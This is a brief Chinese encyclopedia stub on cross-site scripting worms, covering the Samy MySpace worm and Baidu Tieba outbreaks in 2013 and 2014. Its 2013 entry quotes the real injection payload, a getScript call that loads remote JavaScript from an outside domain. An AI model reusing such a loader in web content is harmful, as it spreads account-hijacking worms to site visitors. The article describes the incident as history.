XSS蠕虫

本條目存在以下問題，請協助改善本條目或在討論頁針對議題發表看法。 此條目包含過多行話或專業術語，可能需要簡化或提出進一步解釋。 (2013年5月19日) 請在討論頁中發表對於本議題的看法，並移除或解釋本條目中的行話。 此條目需要擴充。 (2013年5月19日) 请協助改善这篇條目，更進一步的信息可能會在討論頁或扩充请求中找到。请在擴充條目後將此模板移除。 此條目需要补充更多来源。 (2013年5月19日) 请协助補充多方面可靠来源以改善这篇条目，无法查证的内容可能會因為异议提出而被移除。 致使用者：请搜索一下条目的标题（来源搜索："XSS蠕虫" — 网页、新闻、书籍、学术、图像），以检查网络上是否存在该主题的更多可靠来源（判定指引）。

xss蠕虫（cross site scripting worm）是一种跨站病毒，通常由脚本语言Javascript写成，它借由网站访问者传播

历史第一个XSS蠕虫是针对网站Myspace的Samy，它在20小时内感染了100万个账户，作者Samy Kamkar之后被起诉

见对新浪微博的争议#XSS.E6.BC.8F.E6.B4.9E

2013年5月19日， 百度贴吧转帖功能再度出现xss漏洞，大量贴吧内充斥接近满版面， 包含代码getScript（'//xss.retaker.me/1.js'）为标题的帖子，当已登陆用户打开这样的帖子，用户所持账户便以相同方式在多个贴吧转帖原作者的帖，部分网络安全相关人士认为贴吧爆发了大规模XSS蠕虫感染^{[1] [2] [3]}

2014年3月9日， 百度贴吧转帖功能再度出现xss漏洞

由于XSS蠕虫基于浏览器而不是操作系统，取决于其依赖网站的规模，它可以在短时间内达到对巨大数量的计算机感染

1. ^ 百度贴吧XSS蠕虫大量爬行. [2013-05-19]. （原始内容存档于2020-08-11）. 
2. ^ 谷歌搜索
3. ^ 新浪微博, "xss贴吧". [2013-05-19]. （原始内容存档于2019-02-07）.